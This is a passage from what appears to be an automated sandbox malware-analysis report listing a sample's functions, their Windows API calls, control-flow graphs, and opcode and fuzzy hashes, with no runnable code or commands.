                                                                • Instruction ID: 2717cd67f996d4c2e8bc16e4cb86f5a10afe3eaf4e293b4c3756bf8ca306e7d9
                                                                • Opcode Fuzzy Hash: 4878ad03a8b62a9cdd596c374c3c3d12e5e06796720a5a6c02f4c5ca0b7c2a67
                                                                • Instruction Fuzzy Hash: 01713778A00B058FD724EF6AD14175ABBF1FF88308F10892ED48AD7A50DB75E946CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028858EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1162 28858ec-288596c 1163 288596f-28859b9 CreateActCtxA 1162->1163 1165 28859bb-28859c1 1163->1165 1166 28859c2-2885a1c 1163->1166 1165->1166 1173 2885a2b-2885a2f 1166->1173 1174 2885a1e-2885a21 1166->1174 1175 2885a40 1173->1175 1176 2885a31-2885a3d 1173->1176 1174->1173 1178 2885a41 1175->1178 1176->1175 1178->1178
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 028859A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: d92c44abc4f59618edf54e2ea864b1f0b7c2e32474611c757a752fa70dfefde2
                                                                • Instruction ID: 582918c372f2c64158485ce3e7086c1b7b9d19087a6b0bc36d558e4a94e97120
                                                                • Opcode Fuzzy Hash: d92c44abc4f59618edf54e2ea864b1f0b7c2e32474611c757a752fa70dfefde2
                                                                • Instruction Fuzzy Hash: 2D41E2B4C00719CFDB24DFA9C884BCEBBB5BF48304F24806AD409AB255DB75694ACF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 04F91284 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1179 4f91284-4f942fc 1182 4f943ac-4f943cc call 4f9115c 1179->1182 1183 4f94302-4f94307 1179->1183 1190 4f943cf-4f943dc 1182->1190 1185 4f94309-4f94340 1183->1185 1186 4f9435a-4f94392 CallWindowProcW 1183->1186 1192 4f94349-4f94358 1185->1192 1193 4f94342-4f94348 1185->1193 1187 4f9439b-4f943aa 1186->1187 1188 4f94394-4f9439a 1186->1188 1187->1190 1188->1187 1192->1190 1193->1192
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F94381
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1640164622.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4f90000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: 6cb4b290797e75a80ebcddf30c8659bfc57e973212788c8e1f33e703dce98ce0
                                                                • Instruction ID: 37445f86df0c4a23d6b363914b1fdbf8563aafee24046b92cb36460d14ac975f
                                                                • Opcode Fuzzy Hash: 6cb4b290797e75a80ebcddf30c8659bfc57e973212788c8e1f33e703dce98ce0
                                                                • Instruction Fuzzy Hash: 434117B5A04209DFEB14CF99C448AAEBBF5FB98314F248459D519AB321D374A842CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 028844E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1196 28844e0-28859b9 CreateActCtxA 1200 28859bb-28859c1 1196->1200 1201 28859c2-2885a1c 1196->1201 1200->1201 1208 2885a2b-2885a2f 1201->1208 1209 2885a1e-2885a21 1201->1209 1210 2885a40 1208->1210 1211 2885a31-2885a3d 1208->1211 1209->1208 1213 2885a41 1210->1213 1211->1210 1213->1213
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 028859A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: ba34e425b70e12227a612a399f5ea671df43ad326fc952f5fe05d7f04f6becb2
                                                                • Instruction ID: 96d730d12e3fc64fd67a87b3e999f85931f3105216533540297da197f21cdc9c
                                                                • Opcode Fuzzy Hash: ba34e425b70e12227a612a399f5ea671df43ad326fc952f5fe05d7f04f6becb2
                                                                • Instruction Fuzzy Hash: 1641E3B4C0071DCFDB24DFA9C884B9EBBB5BF48304F20806AD409AB255DB756946CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02885A64 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1214 2885a64-2885a70 1215 2885a22 1214->1215 1216 2885a72-2885a77 1214->1216 1218 2885a93 1215->1218 1219 2885a24-2885a27 1215->1219 1217 2885ae9-2885af4 1216->1217 1216->1218 1218->1217 1221 2885a2b-2885a2f 1219->1221 1222 2885a40 1221->1222 1223 2885a31-2885a3d 1221->1223 1225 2885a41 1222->1225 1223->1222 1225->1225
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de1bd430bd37ecbad290d8b23324e4448f51bcd88ba6ea48fd078c0f7739358d
                                                                • Instruction ID: a9be419b945d139070f6d14f8b7a57f9b7db207e474d45695ace0c2f8f7d23a3
                                                                • Opcode Fuzzy Hash: de1bd430bd37ecbad290d8b23324e4448f51bcd88ba6ea48fd078c0f7739358d
                                                                • Instruction Fuzzy Hash: F231E1B8804248CFDB01EFE8C8947DDBBF1AF06308F95419AD005EB265D778A94ACB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288D238 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1226 288d238-288d73c DuplicateHandle 1228 288d73e-288d744 1226->1228 1229 288d745-288d762 1226->1229 1228->1229
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D66E,?,?,?,?,?), ref: 0288D72F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 73730f8482255e5cc61b2ad522cd83bc8d3bad60f964a0c56016a120b4187ed2
                                                                • Instruction ID: d2ed585c88bfe1a88f445339e63c65794d697e966048853a9c77b324d3d96845
                                                                • Opcode Fuzzy Hash: 73730f8482255e5cc61b2ad522cd83bc8d3bad60f964a0c56016a120b4187ed2
                                                                • Instruction Fuzzy Hash: 2D2116B5900248DFDB10DFA9D584ADEBBF4EB48314F14841AE958A3350D374A940CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288D6A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1232 288d6a0-288d73c DuplicateHandle 1233 288d73e-288d744 1232->1233 1234 288d745-288d762 1232->1234 1233->1234
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288D66E,?,?,?,?,?), ref: 0288D72F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 623c6fb2ed8b770da3f0635e7883e3b029a1e63b80b0a4e48fe1d841b9ff0ef9
                                                                • Instruction ID: 5566b285ca7bbe7c1c4df63366cda543e754766b43217a8abbe714a7e1cc2db8
                                                                • Opcode Fuzzy Hash: 623c6fb2ed8b770da3f0635e7883e3b029a1e63b80b0a4e48fe1d841b9ff0ef9
                                                                • Instruction Fuzzy Hash: 422114B5900248AFDB10CFAAD584ADEBFF4EB48314F10841AE958A7350D374A941CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288AEE8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1237 288aee8-288b688 1239 288b68a-288b68d 1237->1239 1240 288b690-288b6bf LoadLibraryExW 1237->1240 1239->1240 1241 288b6c8-288b6e5 1240->1241 1242 288b6c1-288b6c7 1240->1242 1242->1241
                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0288B4A1,00000800,00000000,00000000), ref: 0288B6B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 5cdb64d962b7794ac424e93e4244e6fddf47f563652c8c09b2443a40e6176160
                                                                • Instruction ID: 4f5710371b123d148690b8566e0b4739044d1afa9e2431c1525a80beaea259b6
                                                                • Opcode Fuzzy Hash: 5cdb64d962b7794ac424e93e4244e6fddf47f563652c8c09b2443a40e6176160
                                                                • Instruction Fuzzy Hash: 3411F6BA9003499FDB10DF9AC444ADEFBF4EB88318F10842AE559A7211C375A945CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288B641 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1245 288b641-288b688 1246 288b68a-288b68d 1245->1246 1247 288b690-288b6bf LoadLibraryExW 1245->1247 1246->1247 1248 288b6c8-288b6e5 1247->1248 1249 288b6c1-288b6c7 1247->1249 1249->1248
                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0288B4A1,00000800,00000000,00000000), ref: 0288B6B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 77824aa12ee69f0273a0de127fb757ef5169770a87b0cd679b832f39aef9d1ad
                                                                • Instruction ID: 8d39582f71bdb71b7e139dec9e5574755614a09505ed67246f9492c6f1083c7d
                                                                • Opcode Fuzzy Hash: 77824aa12ee69f0273a0de127fb757ef5169770a87b0cd679b832f39aef9d1ad
                                                                • Instruction Fuzzy Hash: 551112BA9002498FDB20DFAAC444AEEFBF5AB88314F10842AD419A7210C375A545CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288B3C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1252 288b3c0-288b400 1253 288b408-288b433 GetModuleHandleW 1252->1253 1254 288b402-288b405 1252->1254 1255 288b43c-288b450 1253->1255 1256 288b435-288b43b 1253->1256 1254->1253 1256->1255
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B426
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 5173735fbc6757ce19856004bfa528f2642fdd5542dc9b82ff84f3e2fc1bd17d
                                                                • Instruction ID: 209a2b1a81318daaa04619ed06be4d2fc54f17d76d07650ce20cb39a8a7486b0
                                                                • Opcode Fuzzy Hash: 5173735fbc6757ce19856004bfa528f2642fdd5542dc9b82ff84f3e2fc1bd17d
                                                                • Instruction Fuzzy Hash: C9110FB9C003498FCB10DF9AC444ADEFBF4AB88228F10C42AD459A7211C375A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02901768 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,?,?,?), ref: 029017C5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1638026573.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: c9804425400ff98a46c2f4dc4391a881959be7eadc957c6a03fe3fc1413e84d4
                                                                • Instruction ID: af68ab2036d0eb8b13b84798ae9f8f3fe03dbb93de82fcb4741c80e014a51b7d
                                                                • Opcode Fuzzy Hash: c9804425400ff98a46c2f4dc4391a881959be7eadc957c6a03fe3fc1413e84d4
                                                                • Instruction Fuzzy Hash: DA1100B5800348DFDB10CF9AC884BDEBBF8EB48324F10885AE558A7650C375A984CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02901763 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,?,?,?), ref: 029017C5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1638026573.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: a7dd4d9777244260d6e518dfa7c849f8804f206c052dfacffd94329484e642c5
                                                                • Instruction ID: 28133176c83363556acf4a5779182346cc3953d1c00fb0bb9ae319e42427b895
                                                                • Opcode Fuzzy Hash: a7dd4d9777244260d6e518dfa7c849f8804f206c052dfacffd94329484e642c5
                                                                • Instruction Fuzzy Hash: ED1100B5800348DFDB10CF99C989BEEFBF8EB08324F10885AE558A7650C374A584CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD3D8 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfa1a955af0de2ab2e8cc09b4b0a1a0ee5c34fe2df6ee5ff85d8579cbd5eb651
                                                                • Instruction ID: 36892a5355b65b0f63d60e0a00670a640136f6579062904335578c6bc0289b39
                                                                • Opcode Fuzzy Hash: cfa1a955af0de2ab2e8cc09b4b0a1a0ee5c34fe2df6ee5ff85d8579cbd5eb651
                                                                • Instruction Fuzzy Hash: FC212871500208DFDB05DF14D9C4B26BF67FB94314F25C169DA094B256C336E856C6B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD4C4 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73b0b495dd908ea41db1be2ac09534462432e002be2252d7899b4d391df1c7fa
                                                                • Instruction ID: c1aabfd4558cd770c1a473feb486e14298eab3bfcac9f7478c62c0a37fc4579a
                                                                • Opcode Fuzzy Hash: 73b0b495dd908ea41db1be2ac09534462432e002be2252d7899b4d391df1c7fa
                                                                • Instruction Fuzzy Hash: 3F21FFB1504248EFCB05DF14D980B2ABF67FB98318F24C569EA490B356C336D856DAB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00E0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636997824.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e0d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
                                                                • Instruction ID: ca911c107ccca57c1003ef369f91b9138e7d6484bda20c7b33d33cf547f88dbd
                                                                • Opcode Fuzzy Hash: 311bc8739ec9aebb0c857ce8e12247e9233cfb5c99caaedd17c0b13452cbc39c
                                                                • Instruction Fuzzy Hash: 9F210471508304EFDB05DF94D9C0B26BBA5FB84318F20C66DE8095B2A6C336D896CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00E0D01C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636997824.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e0d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                • Instruction ID: 4264615849dba07012dc3fa4310b32f6292a914cf635cf810bab46e223366690
                                                                • Opcode Fuzzy Hash: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                • Instruction Fuzzy Hash: C821F271608200DFDB14DF54D984B26BBA6EB84318F20C569D84E5B296C33AD887CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00E0D005 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636997824.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e0d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                • Instruction ID: a09051e606c65a65067a9dda346b4b4d7f5621bfba1858ff9f82c2c28fe02721
                                                                • Opcode Fuzzy Hash: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                • Instruction Fuzzy Hash: 8821837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD3D3 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: 6711799c8d4c8bd4f148a6ff89b05dc404e7d5efe7d1ce7e724faaa52326ae42
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: AE110372404244CFCB02CF00D5C4B26BF72FB94324F28C2A9D9090B656C33AE85ACBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD4BF Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: d8a48206a908892c1781dd8cdc30df82586503a33997b087fcce6855bfef39b5
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: 3311D376504284CFCB16CF14D5C4B26BF72FB94318F28C6A9D9490B756C336D85ACBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00E0D1CF Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636997824.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e0d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction ID: d1dfb7d06571bcab76e5352e397086b29a1ba23414d8f9e289e7682a73e1d4af
                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction Fuzzy Hash: BB11BB75508280DFCB02CF94C9C4B15BBA1FB84318F24C6AAD8494B6A6C33AD85ACB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD745 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cafa884b98f9a0c4e0212567340addc73d70ac02330127c23cc137171985e4e4
                                                                • Instruction ID: 61b4bc9fd26e9eaef4fe864b8f359ba3c24fef9a2caeb7ca741ab2ae57e06aa2
                                                                • Opcode Fuzzy Hash: cafa884b98f9a0c4e0212567340addc73d70ac02330127c23cc137171985e4e4
                                                                • Instruction Fuzzy Hash: 7B01A7710083489AE7116E25CD84B77BF9ADF41324F18C52AEE4A4E296D679D841C6B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00DFD744 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1636940283.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_dfd000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e12102272e7bed5bd19750832f36c6518ac22f418c5411635505ae4c0ee0bc9
                                                                • Instruction ID: bf61d04d8175b80b0cf4cd3027de5b553b2e0691a876d43d16f92d81ef4b307b
                                                                • Opcode Fuzzy Hash: 7e12102272e7bed5bd19750832f36c6518ac22f418c5411635505ae4c0ee0bc9
                                                                • Instruction Fuzzy Hash: D3F062714043449AE7109E16CD88B66FFA9EB91734F18C45AED494E296C2799C44CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 02903250 Relevance: .4, Instructions: 360COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1638026573.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f3811728cfd1575dea736f67bc180b51b530f7a584a66086ef08506d77b7438
                                                                • Instruction ID: 300a791fcbc86905ee262b8439eadb41d41cc4d28d212fd82ca256ed2a87786c
                                                                • Opcode Fuzzy Hash: 1f3811728cfd1575dea736f67bc180b51b530f7a584a66086ef08506d77b7438
                                                                • Instruction Fuzzy Hash: C8D1A8357016089FDB19EB79C490B6EB7EBAF89704F1484AED14ACB2E0CB35E801CB55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 04F90040 Relevance: .3, Instructions: 315COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1640164622.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4f90000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6976e236532af24914853c8ed7464c72a274faa2efca0af4c3ded3e2f549a6bf
                                                                • Instruction ID: add88c5a7eed9ba901ecc88121c6a3585e02b5b02d21cb3935d464bf6a4fb171
                                                                • Opcode Fuzzy Hash: 6976e236532af24914853c8ed7464c72a274faa2efca0af4c3ded3e2f549a6bf
                                                                • Instruction Fuzzy Hash: 6D12B6B0401746EAD310CFA7E95C18A3BB1FB8531EF504649E2616F2E9DBBC994ACF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0288DFCC Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1637888828.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2880000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1cd501cef35207214410204358395a1b0efb4ca720ea5d864000622cbf42eef
                                                                • Instruction ID: 7d1cadb9947e94994bf22ec6ac090d71db8d49e5fa36f09df4f8da7bd426c64c
                                                                • Opcode Fuzzy Hash: b1cd501cef35207214410204358395a1b0efb4ca720ea5d864000622cbf42eef
                                                                • Instruction Fuzzy Hash: 02A16B3AE002098FCF05EFB5C8805AEB7B2FF85305B55456AE905EB265DB35E946CF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 04F9001C Relevance: .2, Instructions: 230COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1640164622.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4f90000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e62f6aa2c7181b6e4970076379700a88380b34e955566a8a40d78b31e657f25a
